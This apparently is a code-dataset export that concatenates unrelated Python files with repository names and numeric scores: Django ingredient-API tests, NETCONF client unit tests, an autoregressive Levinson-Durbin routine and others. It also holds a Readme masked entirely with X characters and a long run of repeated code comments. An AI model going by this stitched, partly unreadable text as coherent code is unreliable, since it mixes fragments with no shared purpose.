set default string if there is no object at all # iterate over objects # append object to list # join list to comma separated string if there are any objects, else default string will remain # get objects # create empty list # set default string if there is no object at all # iterate over objects # append object to list # join list to comma separated string if there are any objects, else default string will remain # get objects # create empty list # set default string if there is no object at all # iterate over objects # append object to list # join list to comma separated string if there are any objects, else default string will remain # finally write log # primary key # main entity information # string representation # define logger # primary key # main entity information # string representation # define logger # primary key # foreign key(s) # main entity information # define unique together # string representation # define logger # primary key # foreign key(s) # main entity information # meta information # string representation # define logger # primary key # main entity information # string representation # define logger # primary key # foreign key(s) # main entity information # meta information # string representation # define logger # cast datetime object to string # else set default string # cast datetime object to string # else set default string # cast datetime object to string # else set default string # cast datetime object to string # else set default string # get objects # create empty list # set default string if there is no object at all # iterate over objects # append object to list # join list to comma separated string if there are any objects, else default string will remain # finally write log # primary key # main entity information # string representation # define logger # primary key # main entity information # string representation # define logger # primary key # main entity information # string representation # define logger
2.33391
2
app/recipe/tests/test_ingredients_api.py
FernandoI7/recipe-app-api
0
6627944
from django.contrib.auth import get_user_model from django.urls import reverse from django.test import TestCase from rest_framework import status from rest_framework.test import APIClient from core.models import Ingredient from recipe.serializers import IngredientSerializer INGREDIENTS_URL = reverse('recipe:ingredient-list') class PublicIngredientApiTests(TestCase): """Testes da API pública de ingredientes""" def setUp(self): self.client = APIClient() def test_login_required(self): """Testa se o login é obrigatório para acessar o endpoint""" res = self.client.get(INGREDIENTS_URL) self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED) class PrivateIngredientApiTests(TestCase): """Testes da API privada de ingredientes""" def setUp(self): self.user = get_user_model().objects.create_user( '<EMAIL>', '1234' ) self.client = APIClient() self.client.force_authenticate(self.user) def test_retrieve_ingredients(self): """Testa se a consulta de ingredientes""" Ingredient.objects.create(user=self.user, name='Arroz') Ingredient.objects.create(user=self.user, name='Ovo') res = self.client.get(INGREDIENTS_URL) ingredients = Ingredient.objects.all().order_by('name') serializer = IngredientSerializer(ingredients, many=True) self.assertEqual(res.status_code, status.HTTP_200_OK) self.assertEqual(res.data, serializer.data) def test_ingredients_limited_to_user(self): """ Testa se a consulta de ingredientes está limitada ao usuário logado """ user2 = get_user_model().objects.create_user( '<EMAIL>', '1234' ) Ingredient.objects.create(user=self.user, name='Arroz') Ingredient.objects.create(user=self.user, name='Ovo') other_ingredient = Ingredient.objects.create( user=user2, name='Farinha' ) res = self.client.get(INGREDIENTS_URL) self.assertEqual(res.status_code, status.HTTP_200_OK) self.assertEqual(len(res.data), 2) self.assertNotIn(other_ingredient, res.data) def test_create_ingredients_successful(self): """Testa a criação dos ingredientes""" payload = { 'name': 'Pimenta' } res = self.client.post(INGREDIENTS_URL, payload) exists = Ingredient.objects.filter( user=self.user, name=payload['name'] ).exists() self.assertEqual(res.status_code, status.HTTP_201_CREATED) self.assertTrue(exists) def test_create_ingredients_invalid_payload(self): """Testa a criação dos ingredients com payload inválido""" payload = { 'name': '' } res = self.client.post(INGREDIENTS_URL, payload) self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
from django.contrib.auth import get_user_model from django.urls import reverse from django.test import TestCase from rest_framework import status from rest_framework.test import APIClient from core.models import Ingredient from recipe.serializers import IngredientSerializer INGREDIENTS_URL = reverse('recipe:ingredient-list') class PublicIngredientApiTests(TestCase): """Testes da API pública de ingredientes""" def setUp(self): self.client = APIClient() def test_login_required(self): """Testa se o login é obrigatório para acessar o endpoint""" res = self.client.get(INGREDIENTS_URL) self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED) class PrivateIngredientApiTests(TestCase): """Testes da API privada de ingredientes""" def setUp(self): self.user = get_user_model().objects.create_user( '<EMAIL>', '1234' ) self.client = APIClient() self.client.force_authenticate(self.user) def test_retrieve_ingredients(self): """Testa se a consulta de ingredientes""" Ingredient.objects.create(user=self.user, name='Arroz') Ingredient.objects.create(user=self.user, name='Ovo') res = self.client.get(INGREDIENTS_URL) ingredients = Ingredient.objects.all().order_by('name') serializer = IngredientSerializer(ingredients, many=True) self.assertEqual(res.status_code, status.HTTP_200_OK) self.assertEqual(res.data, serializer.data) def test_ingredients_limited_to_user(self): """ Testa se a consulta de ingredientes está limitada ao usuário logado """ user2 = get_user_model().objects.create_user( '<EMAIL>', '1234' ) Ingredient.objects.create(user=self.user, name='Arroz') Ingredient.objects.create(user=self.user, name='Ovo') other_ingredient = Ingredient.objects.create( user=user2, name='Farinha' ) res = self.client.get(INGREDIENTS_URL) self.assertEqual(res.status_code, status.HTTP_200_OK) self.assertEqual(len(res.data), 2) self.assertNotIn(other_ingredient, res.data) def test_create_ingredients_successful(self): """Testa a criação dos ingredientes""" payload = { 'name': 'Pimenta' } res = self.client.post(INGREDIENTS_URL, payload) exists = Ingredient.objects.filter( user=self.user, name=payload['name'] ).exists() self.assertEqual(res.status_code, status.HTTP_201_CREATED) self.assertTrue(exists) def test_create_ingredients_invalid_payload(self): """Testa a criação dos ingredients com payload inválido""" payload = { 'name': '' } res = self.client.post(INGREDIENTS_URL, payload) self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
pt
0.827162
Testes da API pública de ingredientes Testa se o login é obrigatório para acessar o endpoint Testes da API privada de ingredientes Testa se a consulta de ingredientes Testa se a consulta de ingredientes está limitada ao usuário logado Testa a criação dos ingredientes Testa a criação dos ingredients com payload inválido
2.59122
3
retina/model/anchors/builder.py
mike112223/retina
0
6627945
from retina.utils import build_from_cfg from .registry import ANCHORS def build_anchor(cfg, default_args=None): anchor = build_from_cfg(cfg, ANCHORS, default_args) return anchor
from retina.utils import build_from_cfg from .registry import ANCHORS def build_anchor(cfg, default_args=None): anchor = build_from_cfg(cfg, ANCHORS, default_args) return anchor
none
1
1.61391
2
env/__init__.py
jidiai/ai_lib
99
6627946
from .snakes import * from .reversi import * from .gobang import * from .sokoban import * from .ccgame import * from .football import * from .MiniWorld import * from .minigrid import * from .particleenv import * from .overcookedai import * from .magent import * from .gridworld import * from .cliffwalking import * from .smarts_jidi import * from .sc2 import * from .olympics_running import * from .smarts_ngsim import * from .gym_robotics import *
from .snakes import * from .reversi import * from .gobang import * from .sokoban import * from .ccgame import * from .football import * from .MiniWorld import * from .minigrid import * from .particleenv import * from .overcookedai import * from .magent import * from .gridworld import * from .cliffwalking import * from .smarts_jidi import * from .sc2 import * from .olympics_running import * from .smarts_ngsim import * from .gym_robotics import *
none
1
1.139227
1
tests/unit/driver/test_sync_driver.py
dmulyalin/scrapli_netconf
61
6627947
<reponame>dmulyalin/scrapli_netconf<filename>tests/unit/driver/test_sync_driver.py<gh_stars>10-100 from scrapli_netconf.constants import NetconfVersion def test_get(monkeypatch, dummy_conn): monkeypatch.setattr( "scrapli_netconf.channel.sync_channel.NetconfChannel.send_input_netconf", lambda cls, channel_input: b"<sent!>", ) filter_ = """ <interface-configurations xmlns="http://cisco.com/ns/yang/Cisco-IOS-XR-ifmgr-cfg"> <interface-configuration> <active>act</active> </interface-configuration> </interface-configurations> """ dummy_conn.netconf_version = NetconfVersion.VERSION_1_0 actual_response = dummy_conn.get(filter_=filter_) assert actual_response.raw_result == b"<sent!>" assert ( actual_response.channel_input == """<?xml version=\'1.0\' encoding=\'utf-8\'?>\n<rpc xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="101"><get><filter type="subtree"><interface-configurations xmlns="http://cisco.com/ns/yang/Cisco-IOS-XR-ifmgr-cfg"><interface-configuration><active>act</active></interface-configuration></interface-configurations></filter></get></rpc>]]>]]>""" ) def test_get_config(monkeypatch, dummy_conn): monkeypatch.setattr( "scrapli_netconf.channel.sync_channel.NetconfChannel.send_input_netconf", lambda cls, channel_input: b"<sent!>", ) dummy_conn.netconf_version = NetconfVersion.VERSION_1_0 dummy_conn.readable_datastores = ["running"] actual_response = dummy_conn.get_config() assert actual_response.raw_result == b"<sent!>" assert ( actual_response.channel_input == """<?xml version=\'1.0\' encoding=\'utf-8\'?>\n<rpc xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="101"><get-config><source><running/></source></get-config></rpc>]]>]]>""" )
from scrapli_netconf.constants import NetconfVersion def test_get(monkeypatch, dummy_conn): monkeypatch.setattr( "scrapli_netconf.channel.sync_channel.NetconfChannel.send_input_netconf", lambda cls, channel_input: b"<sent!>", ) filter_ = """ <interface-configurations xmlns="http://cisco.com/ns/yang/Cisco-IOS-XR-ifmgr-cfg"> <interface-configuration> <active>act</active> </interface-configuration> </interface-configurations> """ dummy_conn.netconf_version = NetconfVersion.VERSION_1_0 actual_response = dummy_conn.get(filter_=filter_) assert actual_response.raw_result == b"<sent!>" assert ( actual_response.channel_input == """<?xml version=\'1.0\' encoding=\'utf-8\'?>\n<rpc xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="101"><get><filter type="subtree"><interface-configurations xmlns="http://cisco.com/ns/yang/Cisco-IOS-XR-ifmgr-cfg"><interface-configuration><active>act</active></interface-configuration></interface-configurations></filter></get></rpc>]]>]]>""" ) def test_get_config(monkeypatch, dummy_conn): monkeypatch.setattr( "scrapli_netconf.channel.sync_channel.NetconfChannel.send_input_netconf", lambda cls, channel_input: b"<sent!>", ) dummy_conn.netconf_version = NetconfVersion.VERSION_1_0 dummy_conn.readable_datastores = ["running"] actual_response = dummy_conn.get_config() assert actual_response.raw_result == b"<sent!>" assert ( actual_response.channel_input == """<?xml version=\'1.0\' encoding=\'utf-8\'?>\n<rpc xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="101"><get-config><source><running/></source></get-config></rpc>]]>]]>""" )
en
0.220313
<interface-configurations xmlns="http://cisco.com/ns/yang/Cisco-IOS-XR-ifmgr-cfg"> <interface-configuration> <active>act</active> </interface-configuration> </interface-configurations> <?xml version=\'1.0\' encoding=\'utf-8\'?>\n<rpc xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="101"><get><filter type="subtree"><interface-configurations xmlns="http://cisco.com/ns/yang/Cisco-IOS-XR-ifmgr-cfg"><interface-configuration><active>act</active></interface-configuration></interface-configurations></filter></get></rpc>]]>]]> <?xml version=\'1.0\' encoding=\'utf-8\'?>\n<rpc xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="101"><get-config><source><running/></source></get-config></rpc>]]>]]>
1.925885
2
adminlte/static/plugins/datatables/extensions/KeyTable/Readme.txt.py
dnaextrim/django_adminlte_x
4
6627948
<reponame>dnaextrim/django_adminlte_x<gh_stars>1-10 X XXXXXXXX XXXXXXXX XXXXXXXX XXXXXXXX XXXXXXXXXXXXX XXX XXXXXXXXXX XXXXXXX XXX XXXXXXXXXX XXXXXXXX XXXXXXX XX XXXXXXXX XXXXX XXXX XXXX XXXXXXXXXX XX XXX XXXXXX XXXXXX XXXXXXX XXXXX XXXXXX XXXX XXX XX XXXXXXXX XX XXXXXXXXXX XXXXXX XXXXXXXX XXXX XX XXX XXXXX XX XXXXX XXXXXXXX XXXXXXXXXXX XXXXXXXXX XXX XXXXXXXX XXXXXXXX X XXXX XX XXX XXXXXXXXXXX XXXX XXXXXXXXXXX X XXXXX XXXXXXXXXX XXXX XXXXXXXXXX X XXXX XXXXX XX XXXXXXXXX XXXXXX X XXXXXXXXXXXX XX XXX XXXXXXXXX XXXXX XXXXXXXX XXXXXXXXXX X XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X XXX XXXXX XXX XXXXXXXX XXXXXXXX XXXXXXX XXXX X XXXXXXXXXXXX XXXXXXXXX XX XXX XXXXXXXXXX XXXXXXXX XXXX XXXX XXXXX XXX XXXXX XX XXX XXXXXXXX XX XXXXXXX XXXXXXXXXX XX XXX XXX XXXXXXXX XXXXXXXX XXXX XXX XXXXXXXXXX XXXXXXXXX XX XXXX XXXXXXXXXXXX X XXXXX XXXXX XXXXXXXX XX XXXXXXXXXXX XXXXX XXX XXX XXXXXX XXXX XX XXXX XX XXXXXXXXXXX XXXXX XXXXXXX XXX XXXXXXXX XXXXX XXXXXXXXXXXXXXXXXX XXXXXXXX XX X XXX XXXXX X XXXXXXXXXXXXXXXXXXXXXXXXXX XXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXX XX X XX XXX X XXXXXXXXXXXXX X XXXXXXX X XXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X XXXXXXXXXX XXXXXXX XXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX X XXXXXX XX XXX XXXXX XXXXXXX XXXXXXXX XXXX XXX XXXXXXXXXXX XX XXXXXXXX XXX XXXX XXXX XX XXXXXXX XXXXXX XXXXX XX XXX XXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
X XXXXXXXX XXXXXXXX XXXXXXXX XXXXXXXX XXXXXXXXXXXXX XXX XXXXXXXXXX XXXXXXX XXX XXXXXXXXXX XXXXXXXX XXXXXXX XX XXXXXXXX XXXXX XXXX XXXX XXXXXXXXXX XX XXX XXXXXX XXXXXX XXXXXXX XXXXX XXXXXX XXXX XXX XX XXXXXXXX XX XXXXXXXXXX XXXXXX XXXXXXXX XXXX XX XXX XXXXX XX XXXXX XXXXXXXX XXXXXXXXXXX XXXXXXXXX XXX XXXXXXXX XXXXXXXX X XXXX XX XXX XXXXXXXXXXX XXXX XXXXXXXXXXX X XXXXX XXXXXXXXXX XXXX XXXXXXXXXX X XXXX XXXXX XX XXXXXXXXX XXXXXX X XXXXXXXXXXXX XX XXX XXXXXXXXX XXXXX XXXXXXXX XXXXXXXXXX X XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X XXX XXXXX XXX XXXXXXXX XXXXXXXX XXXXXXX XXXX X XXXXXXXXXXXX XXXXXXXXX XX XXX XXXXXXXXXX XXXXXXXX XXXX XXXX XXXXX XXX XXXXX XX XXX XXXXXXXX XX XXXXXXX XXXXXXXXXX XX XXX XXX XXXXXXXX XXXXXXXX XXXX XXX XXXXXXXXXX XXXXXXXXX XX XXXX XXXXXXXXXXXX X XXXXX XXXXX XXXXXXXX XX XXXXXXXXXXX XXXXX XXX XXX XXXXXX XXXX XX XXXX XX XXXXXXXXXXX XXXXX XXXXXXX XXX XXXXXXXX XXXXX XXXXXXXXXXXXXXXXXX XXXXXXXX XX X XXX XXXXX X XXXXXXXXXXXXXXXXXXXXXXXXXX XXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXX XX X XX XXX X XXXXXXXXXXXXX X XXXXXXX X XXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X XXXXXXXXXX XXXXXXX XXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX X XXXXXX XX XXX XXXXX XXXXXXX XXXXXXXX XXXX XXX XXXXXXXXXXX XX XXXXXXXX XXX XXXX XXXX XX XXXXXXX XXXXXX XXXXX XX XXX XXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
none
1
1.346326
1
utest/test_development_functionality.py
mawentao119/robotframework-browser
0
6627949
<filename>utest/test_development_functionality.py from Browser.keywords.playwright_state import PlaywrightState def test_pause_on_failure(): def whole_lib(): pass whole_lib._pause_on_failure = set() whole_lib.playwright = whole_lib browser = PlaywrightState(whole_lib) def func(*args, **kwargs): pass browser.new_browser = func browser.new_context = func browser.new_page = func browser.open_browser() assert whole_lib._pause_on_failure
<filename>utest/test_development_functionality.py from Browser.keywords.playwright_state import PlaywrightState def test_pause_on_failure(): def whole_lib(): pass whole_lib._pause_on_failure = set() whole_lib.playwright = whole_lib browser = PlaywrightState(whole_lib) def func(*args, **kwargs): pass browser.new_browser = func browser.new_context = func browser.new_page = func browser.open_browser() assert whole_lib._pause_on_failure
none
1
2.000015
2
dsatools/_base/_arma/_ar_levenson_durbin.py
diarmaidocualain/dsatools
31
6627950
<reponame>diarmaidocualain/dsatools<filename>dsatools/_base/_arma/_ar_levenson_durbin.py import numpy as np import scipy from ... import operators #------------------------------------------ def ar_levenson_durbin(x, order,mode='same',unbias = False): ''' The autoregressive model approximation, based on the Levenson-Dubrin itterative method for solution toeplitz matrix equations. Parameters ------------------- * x: is 1-d input ndarray. * order: int, is the order of the desired model. * mode: string, mode of correlation function, mode = {full, same, straight}. * unbias: bool, if True, the unbiased autocorrleation function will be taken. Returns --------------------- * a: 1d ndarray, autoregression coefficients, * noise_variace: float or complex, variance of model residulas. See also ------------ yule_walker, lsar, covar, burg. Examples ----------- References -------------------- [1a] <NAME>, and <NAME>. "Spectral analysis of signals." (2005). [1b] http://www2.ece.ohio-state.edu/~randy/SAtext/ - Dr.Moses Spectral Analysis of Signals: Resource Page [2a] <NAME>. Statistical Digital Signal Processing and Modeling, John Wiley & Sons, 1996. [2b] https://www.mathworks.com/matlabcentral/fileexchange/ 2183-statistical-digital-signal-processing-and-modeling [3] <NAME>, Digital spectral analysis with applications. – New-York: Present-Hall, 1986. ''' x = np.asarray(x) N = x.shape[0] r = operators.correlation(x,y=None,mode=mode, take_mean=False,unbias=unbias) a = np.zeros((order,), x.dtype) var = r[0] - (r[1] *np.conj(r[1]))/r[0] a[0] = -r[1] / r[0] for i in np.arange(1,order): k = -(r[i+1] + np.sum(a[:i]*r[i:0:-1]))/var #r[i:0:-1]=np.flipud(r[1:i+1]) var = var*(1-(k *np.conj(k))) # same as a[:i+1] = [a,0] + k[a~,1] in Stoic a[:i] = a[:i] + k*np.conj(a[i-1::-1]) a[i] = k # here is sign "-" is already taken a = np.append(1,a) return a, var
import numpy as np import scipy from ... import operators #------------------------------------------ def ar_levenson_durbin(x, order,mode='same',unbias = False): ''' The autoregressive model approximation, based on the Levenson-Dubrin itterative method for solution toeplitz matrix equations. Parameters ------------------- * x: is 1-d input ndarray. * order: int, is the order of the desired model. * mode: string, mode of correlation function, mode = {full, same, straight}. * unbias: bool, if True, the unbiased autocorrleation function will be taken. Returns --------------------- * a: 1d ndarray, autoregression coefficients, * noise_variace: float or complex, variance of model residulas. See also ------------ yule_walker, lsar, covar, burg. Examples ----------- References -------------------- [1a] <NAME>, and <NAME>. "Spectral analysis of signals." (2005). [1b] http://www2.ece.ohio-state.edu/~randy/SAtext/ - Dr.Moses Spectral Analysis of Signals: Resource Page [2a] <NAME>. Statistical Digital Signal Processing and Modeling, John Wiley & Sons, 1996. [2b] https://www.mathworks.com/matlabcentral/fileexchange/ 2183-statistical-digital-signal-processing-and-modeling [3] <NAME>, Digital spectral analysis with applications. – New-York: Present-Hall, 1986. ''' x = np.asarray(x) N = x.shape[0] r = operators.correlation(x,y=None,mode=mode, take_mean=False,unbias=unbias) a = np.zeros((order,), x.dtype) var = r[0] - (r[1] *np.conj(r[1]))/r[0] a[0] = -r[1] / r[0] for i in np.arange(1,order): k = -(r[i+1] + np.sum(a[:i]*r[i:0:-1]))/var #r[i:0:-1]=np.flipud(r[1:i+1]) var = var*(1-(k *np.conj(k))) # same as a[:i+1] = [a,0] + k[a~,1] in Stoic a[:i] = a[:i] + k*np.conj(a[i-1::-1]) a[i] = k # here is sign "-" is already taken a = np.append(1,a) return a, var
en
0.631046
#------------------------------------------ The autoregressive model approximation, based on the Levenson-Dubrin itterative method for solution toeplitz matrix equations. Parameters ------------------- * x: is 1-d input ndarray. * order: int, is the order of the desired model. * mode: string, mode of correlation function, mode = {full, same, straight}. * unbias: bool, if True, the unbiased autocorrleation function will be taken. Returns --------------------- * a: 1d ndarray, autoregression coefficients, * noise_variace: float or complex, variance of model residulas. See also ------------ yule_walker, lsar, covar, burg. Examples ----------- References -------------------- [1a] <NAME>, and <NAME>. "Spectral analysis of signals." (2005). [1b] http://www2.ece.ohio-state.edu/~randy/SAtext/ - Dr.Moses Spectral Analysis of Signals: Resource Page [2a] <NAME>. Statistical Digital Signal Processing and Modeling, John Wiley & Sons, 1996. [2b] https://www.mathworks.com/matlabcentral/fileexchange/ 2183-statistical-digital-signal-processing-and-modeling [3] <NAME>, Digital spectral analysis with applications. – New-York: Present-Hall, 1986. #r[i:0:-1]=np.flipud(r[1:i+1]) # same as a[:i+1] = [a,0] + k[a~,1] in Stoic # here is sign "-" is already taken
2.537355
3